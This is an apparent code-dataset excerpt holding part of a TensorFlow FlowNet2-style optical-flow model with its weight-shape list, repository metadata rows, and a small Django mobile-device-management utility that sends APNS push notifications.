blobs['blob89'] = self.leaky_relu(blobs['blob89'], 0.1)
blobs['blob90'] = tf.pad(blobs['blob89'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob90'] = tf.nn.conv2d(blobs['blob90'], self.weights['net3_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['net3_conv6_b']
blobs['blob90'] = self.leaky_relu(blobs['blob90'], 0.1)
blobs['blob91'] = tf.nn.conv2d(blobs['blob90'], self.weights['net3_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_conv6_1_b']
blobs['blob91'] = self.leaky_relu(blobs['blob91'], 0.1)
blobs['blob92'] = tf.nn.conv2d(blobs['blob91'], self.weights['net3_predict_conv6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv6_b']
blobs['blob93'] = tf.nn.conv2d_transpose(blobs['blob91'], self.weights['net3_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['net3_deconv5_b']
blobs['blob93'] = self.leaky_relu(blobs['blob93'], 0.1)
blobs['blob94'] = tf.nn.conv2d_transpose(blobs['blob92'], self.weights['net3_net3_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow6to5_b']
blobs['blob95'] = tf.concat([blobs['blob89'], blobs['blob93'], blobs['blob94']], axis=3)
blobs['blob96'] = tf.nn.conv2d(blobs['blob95'], self.weights['net3_predict_conv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv5_b']
blobs['blob97'] = tf.nn.conv2d_transpose(blobs['blob95'], self.weights['net3_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['net3_deconv4_b']
blobs['blob97'] = self.leaky_relu(blobs['blob97'], 0.1)
blobs['blob98'] = tf.nn.conv2d_transpose(blobs['blob96'], self.weights['net3_net3_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow5to4_b']
blobs['blob99'] = tf.concat([blobs['blob87'], blobs['blob97'], blobs['blob98']], axis=3)
blobs['blob100'] = tf.nn.conv2d(blobs['blob99'], self.weights['net3_predict_conv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv4_b']
blobs['blob101'] = tf.nn.conv2d_transpose(blobs['blob99'], self.weights['net3_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['net3_deconv3_b']
blobs['blob101'] = self.leaky_relu(blobs['blob101'], 0.1)
blobs['blob102'] = tf.nn.conv2d_transpose(blobs['blob100'], self.weights['net3_net3_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow4to3_b']
blobs['blob103'] = tf.concat([blobs['blob85'], blobs['blob101'], blobs['blob102']], axis=3)
blobs['blob104'] = tf.nn.conv2d(blobs['blob103'], self.weights['net3_predict_conv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv3_b']
blobs['blob105'] = tf.nn.conv2d_transpose(blobs['blob103'], self.weights['net3_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['net3_deconv2_b']
blobs['blob105'] = self.leaky_relu(blobs['blob105'], 0.1)
blobs['blob106'] = tf.nn.conv2d_transpose(blobs['blob104'], self.weights['net3_net3_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['net3_net3_upsample_flow3to2_b']
blobs['blob107'] = tf.concat([blobs['blob83'], blobs['blob105'], blobs['blob106']], axis=3)
blobs['blob108'] = tf.nn.conv2d(blobs['blob107'], self.weights['net3_predict_conv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['net3_predict_conv2_b']
blobs['blob109'] = blobs['blob108'] * 20.
####################################################################################
####################################################################################
####################################################################################
###################### END OF THE THIRD BRANCH ####################################
####################################################################################
####################################################################################
####################################################################################
blobs['blob110'] = tf.concat([blobs['img0_nomean_resize'], blobs['img1_nomean_resize']], axis=3)
#self.run_after(blobs['blob110'], blobs['blob109'])
blobs['blob111'] = tf.nn.conv2d(blobs['blob110'], self.weights['netsd_conv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv0_b']
blobs['blob111'] = self.leaky_relu(blobs['blob111'], 0.1)
blobs['blob112'] = tf.pad(blobs['blob111'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob112'] = tf.nn.conv2d(blobs['blob112'], self.weights['netsd_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv1_b']
blobs['blob112'] = self.leaky_relu(blobs['blob112'], 0.1)
blobs['blob113'] = tf.nn.conv2d(blobs['blob112'], self.weights['netsd_conv1_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv1_1_b']
blobs['blob113'] = self.leaky_relu(blobs['blob113'], 0.1)
blobs['blob114'] = tf.pad(blobs['blob113'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob114'] = tf.nn.conv2d(blobs['blob114'], self.weights['netsd_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv2_b']
blobs['blob114'] = self.leaky_relu(blobs['blob114'], 0.1)
blobs['blob115'] = tf.nn.conv2d(blobs['blob114'], self.weights['netsd_conv2_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv2_1_b']
blobs['blob115'] = self.leaky_relu(blobs['blob115'], 0.1)
blobs['blob116'] = tf.pad(blobs['blob115'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob116'] = tf.nn.conv2d(blobs['blob116'], self.weights['netsd_conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv3_b']
blobs['blob116'] = self.leaky_relu(blobs['blob116'], 0.1)
blobs['blob117'] = tf.nn.conv2d(blobs['blob116'], self.weights['netsd_conv3_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv3_1_b']
blobs['blob117'] = self.leaky_relu(blobs['blob117'], 0.1)
blobs['blob118'] = tf.pad(blobs['blob117'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob118'] = tf.nn.conv2d(blobs['blob118'], self.weights['netsd_conv4_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv4_b']
blobs['blob118'] = self.leaky_relu(blobs['blob118'], 0.1)
blobs['blob119'] = tf.nn.conv2d(blobs['blob118'], self.weights['netsd_conv4_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv4_1_b']
blobs['blob119'] = self.leaky_relu(blobs['blob119'], 0.1)
blobs['blob120'] = tf.pad(blobs['blob119'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob120'] = tf.nn.conv2d(blobs['blob120'], self.weights['netsd_conv5_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv5_b']
blobs['blob120'] = self.leaky_relu(blobs['blob120'], 0.1)
blobs['blob121'] = tf.nn.conv2d(blobs['blob120'], self.weights['netsd_conv5_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv5_1_b']
blobs['blob121'] = self.leaky_relu(blobs['blob121'], 0.1)
blobs['blob122'] = tf.pad(blobs['blob121'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob122'] = tf.nn.conv2d(blobs['blob122'], self.weights['netsd_conv6_w'], strides=[1,2,2,1], padding="VALID") + self.weights['netsd_conv6_b']
blobs['blob122'] = self.leaky_relu(blobs['blob122'], 0.1)
blobs['blob123'] = tf.nn.conv2d(blobs['blob122'], self.weights['netsd_conv6_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_conv6_1_b']
blobs['blob123'] = self.leaky_relu(blobs['blob123'], 0.1)
blobs['blob124'] = tf.nn.conv2d(blobs['blob123'], self.weights['netsd_Convolution1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution1_b']
blobs['blob125'] = tf.nn.conv2d_transpose(blobs['blob123'], self.weights['netsd_deconv5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 512], strides=[1,2,2,1]) + self.weights['netsd_deconv5_b']
blobs['blob125'] = self.leaky_relu(blobs['blob125'], 0.1)
blobs['blob126'] = tf.nn.conv2d_transpose(blobs['blob124'], self.weights['netsd_upsample_flow6to5_w'], output_shape=[batch_size, ADAPTED_HEIGHT/32, ADAPTED_WIDTH/32, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow6to5_b']
blobs['blob127'] = tf.concat([blobs['blob121'], blobs['blob125'], blobs['blob126']], axis=3)
blobs['blob128'] = tf.nn.conv2d(blobs['blob127'], self.weights['netsd_interconv5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv5_b']
blobs['blob129'] = tf.nn.conv2d(blobs['blob128'], self.weights['netsd_Convolution2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution2_b']
blobs['blob130'] = tf.nn.conv2d_transpose(blobs['blob127'], self.weights['netsd_deconv4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 256], strides=[1,2,2,1]) + self.weights['netsd_deconv4_b']
blobs['blob130'] = self.leaky_relu(blobs['blob130'], 0.1)
blobs['blob131'] = tf.nn.conv2d_transpose(blobs['blob129'], self.weights['netsd_upsample_flow5to4_w'], output_shape=[batch_size, ADAPTED_HEIGHT/16, ADAPTED_WIDTH/16, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow5to4_b']
blobs['blob132'] = tf.concat([blobs['blob119'], blobs['blob130'], blobs['blob131']], axis=3)
blobs['blob133'] = tf.nn.conv2d(blobs['blob132'], self.weights['netsd_interconv4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv4_b']
blobs['blob134'] = tf.nn.conv2d(blobs['blob133'], self.weights['netsd_Convolution3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution3_b']
blobs['blob135'] = tf.nn.conv2d_transpose(blobs['blob132'], self.weights['netsd_deconv3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 128], strides=[1,2,2,1]) + self.weights['netsd_deconv3_b']
blobs['blob135'] = self.leaky_relu(blobs['blob135'], 0.1)
blobs['blob136'] = tf.nn.conv2d_transpose(blobs['blob134'], self.weights['netsd_upsample_flow4to3_w'], output_shape=[batch_size, ADAPTED_HEIGHT/8, ADAPTED_WIDTH/8, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow4to3_b']
blobs['blob137'] = tf.concat([blobs['blob117'], blobs['blob135'], blobs['blob136']], axis=3)
blobs['blob138'] = tf.nn.conv2d(blobs['blob137'], self.weights['netsd_interconv3_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv3_b']
blobs['blob139'] = tf.nn.conv2d(blobs['blob138'], self.weights['netsd_Convolution4_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution4_b']
blobs['blob140'] = tf.nn.conv2d_transpose(blobs['blob137'], self.weights['netsd_deconv2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 64], strides=[1,2,2,1]) + self.weights['netsd_deconv2_b']
blobs['blob140'] = self.leaky_relu(blobs['blob140'], 0.1)
blobs['blob141'] = tf.nn.conv2d_transpose(blobs['blob139'], self.weights['netsd_upsample_flow3to2_w'], output_shape=[batch_size, ADAPTED_HEIGHT/4, ADAPTED_WIDTH/4, 2], strides=[1,2,2,1]) + self.weights['netsd_upsample_flow3to2_b']
blobs['blob142'] = tf.concat([blobs['blob115'], blobs['blob140'], blobs['blob141']], axis=3)
blobs['blob143'] = tf.nn.conv2d(blobs['blob142'], self.weights['netsd_interconv2_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_interconv2_b']
blobs['blob144'] = tf.nn.conv2d(blobs['blob143'], self.weights['netsd_Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['netsd_Convolution5_b']
blobs['blob145'] = 0.05*blobs['blob144']
blobs['blob146'] = tf.image.resize_nearest_neighbor(blobs['blob145'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=False)
blobs['blob147'] = tf.image.resize_nearest_neighbor(blobs['blob109'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=False)
#blobs['blob148'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob146']**2, axis=3, keep_dims=True))
blobs['blob148'] = self.l2_norm(blobs['blob146'])
#blobs['blob149'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob147']**2, axis=3, keep_dims=True))
blobs['blob149'] = self.l2_norm(blobs['blob147'])
blobs['blob150'] = self.warp(blobs['img1_nomean_resize'], blobs['blob146'])
blobs['blob151'] = blobs['img0_nomean_resize'] - blobs['blob150']
#blobs['blob152'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob151']**2, axis=3, keep_dims=True))
blobs['blob152'] = self.l2_norm(blobs['blob151'])
blobs['blob153'] = self.warp(blobs['img1_nomean_resize'], blobs['blob147'])
blobs['blob154'] = blobs['img0_nomean_resize'] - blobs['blob153']
#blobs['blob155'] = tf.sqrt(1e-8+tf.reduce_sum(blobs['blob154']**2, axis=3, keep_dims=True))
blobs['blob155'] = self.l2_norm(blobs['blob154'])
blobs['blob156'] = tf.concat([blobs['img0_nomean_resize'], blobs['blob146'], blobs['blob147'], blobs['blob148'], blobs['blob149'], blobs['blob152'], blobs['blob155']], axis=3)
blobs['blob157'] = tf.nn.conv2d(blobs['blob156'], self.weights['fuse_conv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv0_b']
blobs['blob157'] = self.leaky_relu(blobs['blob157'], 0.1)
blobs['blob158'] = tf.pad(blobs['blob157'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob158'] = tf.nn.conv2d(blobs['blob158'], self.weights['fuse_conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['fuse_conv1_b']
blobs['blob158'] = self.leaky_relu(blobs['blob158'], 0.1)
blobs['blob159'] = tf.nn.conv2d(blobs['blob158'], self.weights['fuse_conv1_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv1_1_b']
blobs['blob159'] = self.leaky_relu(blobs['blob159'], 0.1)
blobs['blob160'] = tf.pad(blobs['blob159'], [[0,0], [1,1], [1,1], [0,0]])
blobs['blob160'] = tf.nn.conv2d(blobs['blob160'], self.weights['fuse_conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['fuse_conv2_b']
blobs['blob160'] = self.leaky_relu(blobs['blob160'], 0.1)
blobs['blob161'] = tf.nn.conv2d(blobs['blob160'], self.weights['fuse_conv2_1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_conv2_1_b']
blobs['blob161'] = self.leaky_relu(blobs['blob161'], 0.1)
blobs['blob162'] = tf.nn.conv2d(blobs['blob161'], self.weights['fuse__Convolution5_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution5_b']
blobs['blob163'] = tf.nn.conv2d_transpose(blobs['blob161'], self.weights['fuse_deconv1_w'], output_shape=[batch_size, ADAPTED_HEIGHT/2, ADAPTED_WIDTH/2, 32], strides=[1,2,2,1]) + self.weights['fuse_deconv1_b']
blobs['blob163'] = self.leaky_relu(blobs['blob163'], 0.1)
blobs['blob164'] = tf.nn.conv2d_transpose(blobs['blob162'], self.weights['fuse_upsample_flow2to1_w'], output_shape=[batch_size, ADAPTED_HEIGHT/2, ADAPTED_WIDTH/2, 2], strides=[1,2,2,1]) + self.weights['fuse_upsample_flow2to1_b']
blobs['blob165'] = tf.concat([blobs['blob159'], blobs['blob163'], blobs['blob164']], axis=3)
blobs['blob166'] = tf.nn.conv2d(blobs['blob165'], self.weights['fuse_interconv1_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_interconv1_b']
blobs['blob167'] = tf.nn.conv2d(blobs['blob166'], self.weights['fuse__Convolution6_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution6_b']
blobs['blob168'] = tf.nn.conv2d_transpose(blobs['blob165'], self.weights['fuse_deconv0_w'], output_shape=[batch_size, ADAPTED_HEIGHT/1, ADAPTED_WIDTH/1, 16], strides=[1,2,2,1]) + self.weights['fuse_deconv0_b']
blobs['blob168'] = self.leaky_relu(blobs['blob168'], 0.1)
blobs['blob169'] = tf.nn.conv2d_transpose(blobs['blob167'], self.weights['fuse_upsample_flow1to0_w'], output_shape=[batch_size, ADAPTED_HEIGHT, ADAPTED_WIDTH, 2], strides=[1,2,2,1]) + self.weights['fuse_upsample_flow1to0_b']
blobs['blob170'] = tf.concat([blobs['blob157'], blobs['blob168'], blobs['blob169']], axis=3)
blobs['blob171'] = tf.nn.conv2d(blobs['blob170'], self.weights['fuse_interconv0_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse_interconv0_b']
blobs['blob172'] = tf.nn.conv2d(blobs['blob171'], self.weights['fuse__Convolution7_w'], strides=[1,1,1,1], padding="SAME") + self.weights['fuse__Convolution7_b']
blobs['predict_flow_resize'] = tf.image.resize_bilinear(blobs['blob172'], size=[TARGET_HEIGHT, TARGET_WIDTH], align_corners=True)
scale = tf.stack([SCALE_WIDTH, SCALE_HEIGHT])
scale = tf.reshape(scale, [1,1,1,2])
blobs['predict_flow_final'] = scale*blobs['predict_flow_resize']
self.blobs = blobs
return blobs
def all_variables(self):
return [('netsd_deconv5_w', (4, 4, 512, 1024)),
('netsd_conv1_b', (64,)),
('netsd_upsample_flow5to4_w', (4, 4, 2, 2)),
('conv2_b', (128,)),
('fuse__Convolution5_w', (3, 3, 128, 2)),
('netsd_conv4_1_w', (3, 3, 512, 512)),
('netsd_interconv3_w', (3, 3, 386, 128)),
('netsd_deconv4_w', (4, 4, 256, 1026)),
('deconv4_b', (256,)),
('fuse_interconv0_w', (3, 3, 82, 16)),
('netsd_Convolution2_b', (2,)),
('net3_conv4_b', (512,)),
('net3_conv3_b', (256,)),
('net3_predict_conv2_w', (3, 3, 194, 2)),
('net3_predict_conv3_b', (2,)),
('conv6_1_w', (3, 3, 1024, 1024)),
('fuse_upsample_flow2to1_b', (2,)),
('Convolution1_w', (3, 3, 1024, 2)),
('net3_deconv3_w', (4, 4, 128, 770)),
('net2_deconv3_b', (128,)),
('fuse_conv1_w', (3, 3, 64, 64)),
('conv5_w', (3, 3, 512, 512)),
('Convolution4_w', (3, 3, 386, 2)),
('fuse_conv0_b', (64,)),
('net2_conv3_w', (5, 5, 128, 256)),
('upsample_flow4to3_b', (2,)),
('netsd_conv4_1_b', (512,)),
('fuse_upsample_flow2to1_w', (4, 4, 2, 2)),
('netsd_conv4_b', (512,)),
('net2_net2_upsample_flow3to2_b', (2,)),
('net3_predict_conv4_b', (2,)),
('fuse_upsample_flow1to0_b', (2,)),
('conv4_1_w', (3, 3, 512, 512)),
('deconv2_b', (64,)),
('net2_conv4_1_w', (3, 3, 512, 512)),
('net3_deconv4_w', (4, 4, 256, 1026)),
('net2_deconv5_b', (512,)),
('netsd_deconv5_b', (512,)),
('net2_deconv2_b', (64,)),
('net3_conv2_b', (128,)),
('conv_redir_w', (1, 1, 256, 32)),
('fuse_conv1_1_b', (128,)),
('net2_deconv5_w', (4, 4, 512, 1024)),
('net2_conv5_b', (512,)),
('net2_conv4_w', (3, 3, 256, 512)),
('net2_predict_conv6_w', (3, 3, 1024, 2)),
('netsd_conv5_b', (512,)),
('deconv4_w', (4, 4, 256, 1026)),
('net2_net2_upsample_flow4to3_b', (2,)),
('fuse__Convolution6_w', (3, 3, 32, 2)),
('net3_deconv2_w', (4, 4, 64, 386)),
('net2_conv6_1_w', (3, 3, 1024, 1024)),
('netsd_conv0_b', (64,)),
('netsd_conv5_1_w', (3, 3, 512, 512)),
('net2_conv6_1_b', (1024,)),
('net3_conv2_w', (5, 5, 64, 128)),
('net3_predict_conv6_w', (3, 3, 1024, 2)),
('net3_conv4_1_b', (512,)),
('net3_net3_upsample_flow4to3_w', (4, 4, 2, 2)),
('net2_deconv2_w', (4, 4, 64, 386)),
('deconv3_b', (128,)),
('netsd_interconv5_b', (512,)),
('net2_conv3_1_w', (3, 3, 256, 256)),
('netsd_interconv4_w', (3, 3, 770, 256)),
('net3_deconv3_b', (128,)),
('fuse_conv0_w', (3, 3, 11, 64)),
('net3_predict_conv6_b', (2,)),
('fuse_upsample_flow1to0_w', (4, 4, 2, 2)),
('netsd_deconv3_b', (128,)),
('net3_predict_conv5_w', (3, 3, 1026, 2)),
('netsd_conv5_w', (3, 3, 512, 512)),
('netsd_interconv5_w', (3, 3, 1026, 512)),
('netsd_Convolution3_w', (3, 3, 256, 2)),
('net2_predict_conv4_w', (3, 3, 770, 2)),
('deconv2_w', (4, 4, 64, 386)),
('net3_predict_conv5_b', (2,)),
('fuse__Convolution5_b', (2,)),
('fuse__Convolution7_w', (3, 3, 16, 2)),
('net2_net2_upsample_flow6to5_w', (4, 4, 2, 2)),
('netsd_conv3_b', (256,)),
('net3_conv6_w', (3, 3, 512, 1024)),
('net3_conv1_b', (64,)),
('netsd_Convolution4_b', (2,)),
('net3_conv3_w', (5, 5, 128, 256)),
('netsd_conv0_w', (3, 3, 6, 64)),
('net2_conv4_b', (512,)),
('net2_predict_conv3_w', (3, 3, 386, 2)),
('net3_net3_upsample_flow3to2_w', (4, 4, 2, 2)),
('fuse_conv1_1_w', (3, 3, 64, 128)),
('deconv5_b', (512,)),
('fuse__Convolution7_b', (2,)),
('net3_conv6_1_w', (3, 3, 1024, 1024)),
('net3_net3_upsample_flow5to4_w', (4, 4, 2, 2)),
('net3_conv4_w', (3, 3, 256, 512)),
('upsample_flow5to4_w', (4, 4, 2, 2)),
('conv4_1_b', (512,)),
('img0s_aug_b', (320, 448, 3, 1)),
('conv5_1_b', (512,)),
('net3_conv4_1_w', (3, 3, 512, 512)),
('upsample_flow5to4_b', (2,)),
('net3_conv3_1_b', (256,)),
('Convolution1_b', (2,)),
('upsample_flow4to3_w', (4, 4, 2, 2)),
('conv5_1_w', (3, 3, 512, 512)),
('conv3_1_b', (256,)),
('conv3_w', (5, 5, 128, 256)),
('net2_conv2_b', (128,)),
('net3_net3_upsample_flow6to5_w', (4, 4, 2, 2)),
('upsample_flow3to2_b', (2,)),
('netsd_Convolution5_w', (3, 3, 64, 2)),
('netsd_interconv2_w', (3, 3, 194, 64)),
('net2_predict_conv6_b', (2,)),
('net2_deconv4_w', (4, 4, 256, 1026)),
('scale_conv1_b', (2,)),
('net2_net2_upsample_flow5to4_w', (4, 4, 2, 2)),
('netsd_conv2_b', (128,)),
('netsd_conv2_1_b', (128,)),
('netsd_upsample_flow6to5_w', (4, 4, 2, 2)),
('net2_predict_conv5_b', (2,)),
('net3_conv6_1_b', (1024,)),
('netsd_conv6_w', (3, 3, 512, 1024)),
('Convolution4_b', (2,)),
('net2_predict_conv4_b', (2,)),
('fuse_deconv1_b', (32,)),
('conv3_1_w', (3, 3, 473, 256)),
('net3_deconv2_b', (64,)),
('netsd_conv6_b', (1024,)),
('net2_conv5_1_w', (3, 3, 512, 512)),
('net3_conv5_1_w', (3, 3, 512, 512)),
('deconv5_w', (4, 4, 512, 1024)),
('fuse_conv2_b', (128,)),
('netsd_conv1_1_b', (128,)),
('netsd_upsample_flow6to5_b', (2,)),
('Convolution5_w', (3, 3, 194, 2)),
('scale_conv1_w', (1, 1, 2, 2)),
('net2_net2_upsample_flow5to4_b', (2,)),
('conv6_1_b', (1024,)),
('fuse_conv2_1_b', (128,)),
('netsd_Convolution5_b', (2,)),
('netsd_conv3_1_b', (256,)),
('conv2_w', (5, 5, 64, 128)),
('fuse_conv2_w', (3, 3, 128, 128)),
('net2_conv2_w', (5, 5, 64, 128)),
('conv3_b', (256,)),
('net3_deconv5_w', (4, 4, 512, 1024)),
('img1s_aug_w', (1, 1, 1, 1)),
('netsd_conv2_w', (3, 3, 128, 128)),
('conv6_w', (3, 3, 512, 1024)),
('netsd_conv4_w', (3, 3, 256, 512)),
('net2_conv1_w', (7, 7, 12, 64)),
('netsd_Convolution1_w', (3, 3, 1024, 2)),
('netsd_conv1_w', (3, 3, 64, 64)),
('netsd_deconv4_b', (256,)),
('conv4_w', (3, 3, 256, 512)),
('conv5_b', (512,)),
('net3_deconv5_b', (512,)),
('netsd_interconv3_b', (128,)),
('net3_conv3_1_w', (3, 3, 256, 256)),
('net2_predict_conv5_w', (3, 3, 1026, 2)),
('Convolution3_b', (2,)),
('netsd_conv5_1_b', (512,)),
('netsd_interconv4_b', (256,)),
('conv4_b', (512,)),
('net3_net3_upsample_flow6to5_b', (2,)),
('Convolution5_b', (2,)),
('fuse_conv2_1_w', (3, 3, 128, 128)),
('net3_net3_upsample_flow4to3_b', (2,)),
('conv1_w', (7, 7, 3, 64)),
('upsample_flow6to5_b', (2,)),
('conv6_b', (1024,)),
('netsd_upsample_flow3to2_w', (4, 4, 2, 2)),
('net2_deconv3_w', (4, 4, 128, 770)),
('netsd_conv2_1_w', (3, 3, 128, 128)),
('netsd_Convolution3_b', (2,)),
('netsd_upsample_flow4to3_w', (4, 4, 2, 2)),
('fuse_interconv1_w', (3, 3, 162, 32)),
('netsd_upsample_flow4to3_b', (2,)),
('netsd_conv3_1_w', (3, 3, 256, 256)),
('netsd_deconv3_w', (4, 4, 128, 770)),
('net3_conv5_b', (512,)),
('net3_conv5_1_b', (512,)),
('net2_net2_upsample_flow4to3_w', (4, 4, 2, 2)),
('net2_net2_upsample_flow3to2_w', (4, 4, 2, 2)),
('net2_conv3_b', (256,)),
('netsd_conv6_1_w', (3, 3, 1024, 1024)),
('fuse_deconv0_b', (16,)),
('net2_predict_conv2_w', (3, 3, 194, 2)),
('net2_conv1_b', (64,)),
('net2_conv6_b', (1024,)),
('net3_predict_conv2_b', (2,)),
('net2_conv4_1_b', (512,)),
('netsd_Convolution4_w', (3, 3, 128, 2)),
('deconv3_w', (4, 4, 128, 770)),
('fuse_deconv1_w', (4, 4, 32, 128)),
('netsd_Convolution2_w', (3, 3, 512, 2)),
('netsd_Convolution1_b', (2,)),
('net2_conv3_1_b', (256,)),
('fuse_conv1_b', (64,)),
('net2_deconv4_b', (256,)),
('net3_predict_conv4_w', (3, 3, 770, 2)),
('Convolution3_w', (3, 3, 770, 2)),
('netsd_upsample_flow3to2_b', (2,)),
('net3_net3_upsample_flow3to2_b', (2,)),
('fuse_interconv0_b', (16,)),
('Convolution2_w', (3, 3, 1026, 2)),
('net2_conv6_w', (3, 3, 512, 1024)),
('netsd_conv3_w', (3, 3, 128, 256)),
('netsd_upsample_flow5to4_b', (2,)),
('net3_predict_conv3_w', (3, 3, 386, 2)),
('conv_redir_b', (32,)),
('net2_conv5_1_b', (512,)),
('upsample_flow6to5_w', (4, 4, 2, 2)),
('net2_net2_upsample_flow6to5_b', (2,)),
('net3_conv6_b', (1024,)),
('fuse__Convolution6_b', (2,)),
('Convolution2_b', (2,)),
('upsample_flow3to2_w', (4, 4, 2, 2)),
('net3_conv1_w', (7, 7, 12, 64)),
('fuse_deconv0_w', (4, 4, 16, 162)),
('img0s_aug_w', (1, 1, 1, 1)),
('netsd_conv1_1_w', (3, 3, 64, 128)),
('netsd_deconv2_b', (64,)),
('net2_conv5_w', (3, 3, 512, 512)),
('fuse_interconv1_b', (32,)),
('netsd_conv6_1_b', (1024,)),
('netsd_interconv2_b', (64,)),
('img1s_aug_b', (320, 448, 3, 1)),
('netsd_deconv2_w', (4, 4, 64, 386)),
('net2_predict_conv3_b', (2,)),
('net2_predict_conv2_b', (2,)),
('net3_deconv4_b', (256,)),
('net3_net3_upsample_flow5to4_b', (2,)),
('conv1_b', (64,)),
('net3_conv5_w', (3, 3, 512, 512))]
| 63.473424
| 253
| 0.574761
| 51,245
| 0.997955
| 0
| 0
| 0
| 0
| 0
| 0
| 17,778
| 0.346212
|
a1e2e6423c6af48c84a3959d270e3cdaa9b51fa4
| 874
|
py
|
Python
|
mdm/utils.py
|
agnihotri7/dj_mdm
|
9fc68393d270d361d2a37b726282277b15121658
|
[
"MIT"
] | null | null | null |
mdm/utils.py
|
agnihotri7/dj_mdm
|
9fc68393d270d361d2a37b726282277b15121658
|
[
"MIT"
] | null | null | null |
mdm/utils.py
|
agnihotri7/dj_mdm
|
9fc68393d270d361d2a37b726282277b15121658
|
[
"MIT"
] | null | null | null |
"""
"""
import sys
import uuid
import base64
import fileinput
import datetime
from django.utils import timezone
from django.conf import settings
from django.shortcuts import get_object_or_404
from urlparse import urlparse, parse_qs
from APNSWrapper import *
from mdm.models import MDMDevice, DeviceCommand
def replaceAll(file, searchExp, replaceExp):
for line in fileinput.input(file, inplace=1):
if searchExp in line:
line = line.replace(searchExp, replaceExp)
sys.stdout.write(line)
def notify_device(device):
device_token = base64.b64decode(device.device_token)
cert = settings.APNS_CERT
wrapper = APNSNotificationWrapper(cert, False)
message = APNSNotification()
message.token(device_token)
message.appendProperty(APNSProperty('mdm', str(device.push_magic)))
wrapper.append(message)
wrapper.notify()
| 25.705882
| 71
| 0.751716
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 12
| 0.01373
|
a1e35648e878d2c215539f5ee4e619b32ea82f3c
| 34,207
|
py
|
Python
|
gollyx_maps/rainbow.py
|
golly-splorts/gollyx-maps
|
